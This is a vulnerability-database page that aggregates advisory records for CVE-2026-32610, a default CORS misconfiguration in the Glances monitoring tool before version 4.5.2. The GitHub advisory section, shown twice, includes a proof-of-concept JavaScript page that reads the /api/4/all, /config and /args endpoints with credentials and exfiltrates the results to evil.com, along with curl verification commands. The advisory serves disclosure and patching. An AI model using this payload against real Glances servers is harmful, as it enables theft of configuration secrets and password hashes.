Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-32610 (GCVE-0-2026-32610)
Vulnerability from cvelistv5 – Published: 2026-03-18 16:31 – Updated: 2026-03-18 16:59
VLAI
EPSS
Title
Glances's Default CORS Configuration Allows Cross-Origin Credential Theft
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=["*"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette's `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.
Severity
8.1 (High)
CWE
- CWE-942 - Permissive Cross-domain Policy with Untrusted Domains
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/commit/44651… | x_refsource_MISC |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32610",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-18T16:59:20.865855Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T16:59:40.327Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\"*\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-942",
"description": "CWE-942: Permissive Cross-domain Policy with Untrusted Domains",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T16:31:12.154Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq"
},
{
"name": "https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
}
],
"source": {
"advisory": "GHSA-9jfm-9rc6-2hfq",
"discovery": "UNKNOWN"
},
"title": "Glances\u0027s Default CORS Configuration Allows Cross-Origin Credential Theft"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32610",
"datePublished": "2026-03-18T16:31:12.154Z",
"dateReserved": "2026-03-12T14:54:24.270Z",
"dateUpdated": "2026-03-18T16:59:40.327Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-32610",
"date": "2026-05-25",
"epss": "0.00055",
"percentile": "0.17207"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-32610\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-18T17:16:06.947\",\"lastModified\":\"2026-03-21T00:16:56.353\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\\\"*\\\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-942\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.5.2\",\"matchCriteriaId\":\"3FC19E01-80F1-43BB-912C-39FE99143A59\"}]}]}],\"references\":[{\"url\":\"https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nicolargo/glances/releases/tag/v4.5.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32610\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-18T16:59:20.865855Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-18T16:59:34.494Z\"}}], \"cna\": {\"title\": \"Glances\u0027s Default CORS Configuration Allows Cross-Origin Credential Theft\", \"source\": {\"advisory\": \"GHSA-9jfm-9rc6-2hfq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.2\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832\", \"name\": \"https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.2\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\\\"*\\\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-942\", \"description\": \"CWE-942: Permissive Cross-domain Policy with Untrusted Domains\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-18T16:31:12.154Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-32610\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-18T16:59:40.327Z\", \"dateReserved\": \"2026-03-12T14:54:24.270Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-18T16:31:12.154Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-32610
Vulnerability from fkie_nvd - Published: 2026-03-18 17:16 - Updated: 2026-03-21 00:16
Severity
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=["*"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette's `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59",
"versionEndExcluding": "4.5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\"*\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue."
},
{
"lang": "es",
"value": "Glances es una herramienta de monitorizaci\u00f3n de sistemas multiplataforma de c\u00f3digo abierto. Antes de la versi\u00f3n 4.5.2, el servidor web de la API REST de Glances se distribuye con una configuraci\u00f3n CORS predeterminada que establece `allow_origins=[\"*\"]` combinado con `allow_credentials=True`. Cuando ambas opciones est\u00e1n habilitadas juntas, el `CORSMiddleware` de Starlette refleja el valor del encabezado `Origin` de la solicitud en el encabezado de respuesta `Access-Control-Allow-Origin` en lugar de devolver el comod\u00edn literal `*`. Esto otorga efectivamente a cualquier sitio web la capacidad de realizar solicitudes API de origen cruzado con credenciales al servidor de Glances, lo que permite el robo de datos entre sitios de informaci\u00f3n de monitorizaci\u00f3n del sistema, secretos de configuraci\u00f3n y argumentos de l\u00ednea de comandos de cualquier usuario que tenga una sesi\u00f3n de navegador activa con una instancia de Glances. La versi\u00f3n 4.5.2 corrige el problema."
}
],
"id": "CVE-2026-32610",
"lastModified": "2026-03-21T00:16:56.353",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-18T17:16:06.947",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-942"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-9JFM-9RC6-2HFQ
Vulnerability from github – Published: 2026-03-16 16:32 – Updated: 2026-03-18 21:48
VLAI
Summary
Glances's Default CORS Configuration Allows Cross-Origin Credential Theft
Details
Summary
The Glances REST API web server ships with a default CORS configuration that sets allow_origins=["*"] combined with allow_credentials=True. When both of these options are enabled together, Starlette's CORSMiddleware reflects the requesting Origin header value in the Access-Control-Allow-Origin response header instead of returning the literal * wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance.
Details
The CORS configuration is set up in glances/outputs/glances_restful_api.py lines 290-299:
# glances/outputs/glances_restful_api.py:290-299
# FastAPI Enable CORS
# https://fastapi.tiangolo.com/tutorial/cors/
self._app.add_middleware(
CORSMiddleware,
# Related to https://github.com/nicolargo/glances/issues/2812
allow_origins=config.get_list_value('outputs', 'cors_origins', default=["*"]),
allow_credentials=config.get_bool_value('outputs', 'cors_credentials', default=True),
allow_methods=config.get_list_value('outputs', 'cors_methods', default=["*"]),
allow_headers=config.get_list_value('outputs', 'cors_headers', default=["*"]),
)
The defaults are loaded from the config file, but when no config is provided (which is the common case for most deployments), the defaults are:
- cors_origins = ["*"] (all origins)
- cors_credentials = True (allow credentials)
Per the CORS specification, browsers should not send credentials when Access-Control-Allow-Origin: *. However, Starlette's CORSMiddleware implements a workaround: when allow_origins=["*"] and allow_credentials=True, the middleware reflects the requesting origin in the response header instead of using *. This means:
- Attacker hosts
https://evil.com/steal.html - Victim (who has authenticated to Glances via browser Basic Auth dialog) visits that page
- JavaScript on
evil.commakesfetch("http://glances-server:61208/api/4/config", {credentials: "include"}) - The browser sends the stored Basic Auth credentials
- Starlette responds with
Access-Control-Allow-Origin: https://evil.comandAccess-Control-Allow-Credentials: true - The browser allows JavaScript to read the response
- Attacker exfiltrates the configuration including sensitive data
When Glances is running without --password (the default for most internal network deployments), no authentication is required at all. Any website can directly read all API endpoints including system stats, process lists, configuration, and command line arguments.
PoC
Step 1: Attacker hosts a malicious page.
<!-- steal-glances.html hosted on attacker's server -->
<script>
async function steal() {
const target = "http://glances-server:61208";
// Steal system stats (processes, CPU, memory, network, disk)
const all = await fetch(target + "/api/4/all", {credentials: "include"});
const allData = await all.json();
// Steal configuration (may contain database passwords, API keys)
const config = await fetch(target + "/api/4/config", {credentials: "include"});
const configData = await config.json();
// Steal command line args (contains password hash, SNMP creds)
const args = await fetch(target + "/api/4/args", {credentials: "include"});
const argsData = await args.json();
// Exfiltrate to attacker
fetch("https://evil.com/collect", {
method: "POST",
body: JSON.stringify({all: allData, config: configData, args: argsData})
});
}
steal();
</script>
Step 2: Verify CORS headers (without auth, default Glances).
# Start Glances web server (default, no password)
glances -w
# From a different origin, verify the CORS headers
curl -s -D- -o /dev/null \
-H "Origin: https://evil.com" \
http://localhost:61208/api/4/all
# Expected response headers include:
# Access-Control-Allow-Origin: https://evil.com
# Access-Control-Allow-Credentials: true
Step 3: Verify data theft (without auth).
curl -s http://localhost:61208/api/4/all | python -m json.tool | head -20
curl -s http://localhost:61208/api/4/config | python -m json.tool
curl -s http://localhost:61208/api/4/args | python -m json.tool
Step 4: With authentication enabled, verify CORS still allows cross-origin credentialed requests.
# Start Glances with password
glances -w --password
# Preflight request with credentials
curl -s -D- -o /dev/null \
-X OPTIONS \
-H "Origin: https://evil.com" \
-H "Access-Control-Request-Method: GET" \
-H "Access-Control-Request-Headers: Authorization" \
http://localhost:61208/api/4/all
# Expected: Access-Control-Allow-Origin: https://evil.com
# Expected: Access-Control-Allow-Credentials: true
Impact
-
Without
--password(default): Any website visited by a user on the same network can silently read all Glances API endpoints, including complete system monitoring data (process list with command lines, CPU/memory/disk stats, network interfaces and IP addresses, filesystem mounts, Docker container info), configuration file contents (which may contain database passwords, export backend credentials, API keys), and command line arguments. -
With
--password: If the user has previously authenticated via the browser's Basic Auth dialog (which caches credentials), any website can make cross-origin requests that carry those cached credentials. This allows exfiltration of all the above data plus the password hash itself (via/api/4/args). -
Network reconnaissance: An attacker can use this to map internal network infrastructure by having victims visit a page that probes common Glances ports (61208) on internal IPs.
-
Chained with POST endpoints: The CORS policy also allows
POSTmethods, enabling an attacker to clear event logs (/api/4/events/clear/all) or modify process monitoring (/api/4/processes/extended/{pid}).
Recommended Fix
Change the default CORS credentials setting to False, and when credentials are enabled, require explicit origin configuration instead of wildcard:
# glances/outputs/glances_restful_api.py
# Option 1: Change default to not allow credentials with wildcard origins
cors_origins = config.get_list_value('outputs', 'cors_origins', default=["*"])
cors_credentials = config.get_bool_value('outputs', 'cors_credentials', default=False) # Changed from True
# Option 2: Reject the insecure combination at startup
if cors_origins == ["*"] and cors_credentials:
logger.warning(
"CORS: allow_origins='*' with allow_credentials=True is insecure. "
"Setting allow_credentials to False. Configure specific origins to enable credentials."
)
cors_credentials = False
self._app.add_middleware(
CORSMiddleware,
allow_origins=cors_origins,
allow_credentials=cors_credentials,
allow_methods=config.get_list_value('outputs', 'cors_methods', default=["GET"]), # Also restrict methods
allow_headers=config.get_list_value('outputs', 'cors_headers', default=["*"]),
)
Severity
8.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32610"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-16T16:32:22Z",
"nvd_published_at": "2026-03-18T17:16:06Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\"*\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance.\n\n## Details\n\nThe CORS configuration is set up in `glances/outputs/glances_restful_api.py` lines 290-299:\n\n```python\n# glances/outputs/glances_restful_api.py:290-299\n# FastAPI Enable CORS\n# https://fastapi.tiangolo.com/tutorial/cors/\nself._app.add_middleware(\n CORSMiddleware,\n # Related to https://github.com/nicolargo/glances/issues/2812\n allow_origins=config.get_list_value(\u0027outputs\u0027, \u0027cors_origins\u0027, default=[\"*\"]),\n allow_credentials=config.get_bool_value(\u0027outputs\u0027, \u0027cors_credentials\u0027, default=True),\n allow_methods=config.get_list_value(\u0027outputs\u0027, \u0027cors_methods\u0027, default=[\"*\"]),\n allow_headers=config.get_list_value(\u0027outputs\u0027, \u0027cors_headers\u0027, default=[\"*\"]),\n)\n```\n\nThe defaults are loaded from the config file, but when no config is provided (which is the common case for most deployments), the defaults are:\n- `cors_origins = [\"*\"]` (all origins)\n- `cors_credentials = True` (allow credentials)\n\nPer the CORS specification, browsers should not send credentials when `Access-Control-Allow-Origin: *`. However, Starlette\u0027s `CORSMiddleware` implements a workaround: when `allow_origins=[\"*\"]` and `allow_credentials=True`, the middleware reflects the requesting origin in the response header instead of using `*`. This means:\n\n1. Attacker hosts `https://evil.com/steal.html`\n2. Victim (who has authenticated to Glances via browser Basic Auth dialog) visits that page\n3. JavaScript on `evil.com` makes `fetch(\"http://glances-server:61208/api/4/config\", {credentials: \"include\"})`\n4. The browser sends the stored Basic Auth credentials\n5. Starlette responds with `Access-Control-Allow-Origin: https://evil.com` and `Access-Control-Allow-Credentials: true`\n6. The browser allows JavaScript to read the response\n7. Attacker exfiltrates the configuration including sensitive data\n\nWhen Glances is running **without** `--password` (the default for most internal network deployments), no authentication is required at all. Any website can directly read all API endpoints including system stats, process lists, configuration, and command line arguments.\n\n## PoC\n\n**Step 1: Attacker hosts a malicious page.**\n\n```html\n\u003c!-- steal-glances.html hosted on attacker\u0027s server --\u003e\n\u003cscript\u003e\nasync function steal() {\n const target = \"http://glances-server:61208\";\n \n // Steal system stats (processes, CPU, memory, network, disk)\n const all = await fetch(target + \"/api/4/all\", {credentials: \"include\"});\n const allData = await all.json();\n \n // Steal configuration (may contain database passwords, API keys)\n const config = await fetch(target + \"/api/4/config\", {credentials: \"include\"});\n const configData = await config.json();\n \n // Steal command line args (contains password hash, SNMP creds)\n const args = await fetch(target + \"/api/4/args\", {credentials: \"include\"});\n const argsData = await args.json();\n \n // Exfiltrate to attacker\n fetch(\"https://evil.com/collect\", {\n method: \"POST\",\n body: JSON.stringify({all: allData, config: configData, args: argsData})\n });\n}\nsteal();\n\u003c/script\u003e\n```\n\n**Step 2: Verify CORS headers (without auth, default Glances).**\n\n```bash\n# Start Glances web server (default, no password)\nglances -w\n\n# From a different origin, verify the CORS headers\ncurl -s -D- -o /dev/null \\\n -H \"Origin: https://evil.com\" \\\n http://localhost:61208/api/4/all\n\n# Expected response headers include:\n# Access-Control-Allow-Origin: https://evil.com\n# Access-Control-Allow-Credentials: true\n```\n\n**Step 3: Verify data theft (without auth).**\n\n```bash\ncurl -s http://localhost:61208/api/4/all | python -m json.tool | head -20\ncurl -s http://localhost:61208/api/4/config | python -m json.tool\ncurl -s http://localhost:61208/api/4/args | python -m json.tool\n```\n\n**Step 4: With authentication enabled, verify CORS still allows cross-origin credentialed requests.**\n\n```bash\n# Start Glances with password\nglances -w --password\n\n# Preflight request with credentials\ncurl -s -D- -o /dev/null \\\n -X OPTIONS \\\n -H \"Origin: https://evil.com\" \\\n -H \"Access-Control-Request-Method: GET\" \\\n -H \"Access-Control-Request-Headers: Authorization\" \\\n http://localhost:61208/api/4/all\n\n# Expected: Access-Control-Allow-Origin: https://evil.com\n# Expected: Access-Control-Allow-Credentials: true\n```\n\n## Impact\n\n- **Without `--password` (default):** Any website visited by a user on the same network can silently read all Glances API endpoints, including complete system monitoring data (process list with command lines, CPU/memory/disk stats, network interfaces and IP addresses, filesystem mounts, Docker container info), configuration file contents (which may contain database passwords, export backend credentials, API keys), and command line arguments.\n\n- **With `--password`:** If the user has previously authenticated via the browser\u0027s Basic Auth dialog (which caches credentials), any website can make cross-origin requests that carry those cached credentials. This allows exfiltration of all the above data plus the password hash itself (via `/api/4/args`).\n\n- **Network reconnaissance:** An attacker can use this to map internal network infrastructure by having victims visit a page that probes common Glances ports (61208) on internal IPs.\n\n- **Chained with POST endpoints:** The CORS policy also allows `POST` methods, enabling an attacker to clear event logs (`/api/4/events/clear/all`) or modify process monitoring (`/api/4/processes/extended/{pid}`).\n\n## Recommended Fix\n\nChange the default CORS credentials setting to `False`, and when credentials are enabled, require explicit origin configuration instead of wildcard:\n\n```python\n# glances/outputs/glances_restful_api.py\n\n# Option 1: Change default to not allow credentials with wildcard origins\ncors_origins = config.get_list_value(\u0027outputs\u0027, \u0027cors_origins\u0027, default=[\"*\"])\ncors_credentials = config.get_bool_value(\u0027outputs\u0027, \u0027cors_credentials\u0027, default=False) # Changed from True\n\n# Option 2: Reject the insecure combination at startup\nif cors_origins == [\"*\"] and cors_credentials:\n logger.warning(\n \"CORS: allow_origins=\u0027*\u0027 with allow_credentials=True is insecure. \"\n \"Setting allow_credentials to False. Configure specific origins to enable credentials.\"\n )\n cors_credentials = False\n\nself._app.add_middleware(\n CORSMiddleware,\n allow_origins=cors_origins,\n allow_credentials=cors_credentials,\n allow_methods=config.get_list_value(\u0027outputs\u0027, \u0027cors_methods\u0027, default=[\"GET\"]), # Also restrict methods\n allow_headers=config.get_list_value(\u0027outputs\u0027, \u0027cors_headers\u0027, default=[\"*\"]),\n)\n```",
"id": "GHSA-9jfm-9rc6-2hfq",
"modified": "2026-03-18T21:48:24Z",
"published": "2026-03-16T16:32:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9jfm-9rc6-2hfq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32610"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/commit/4465169b71d93991f1e49740fe02428291099832"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances\u0027s Default CORS Configuration Allows Cross-Origin Credential Theft"
}
OPENSUSE-SU-2026:10415-1
Vulnerability from csaf_opensuse - Published: 2026-03-24 00:00 - Updated: 2026-03-24 00:00Summary
glances-common-4.5.2-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: glances-common-4.5.2-1.1 on GA media
Description of the patch: These are all security issues fixed in the glances-common-4.5.2-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10415
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
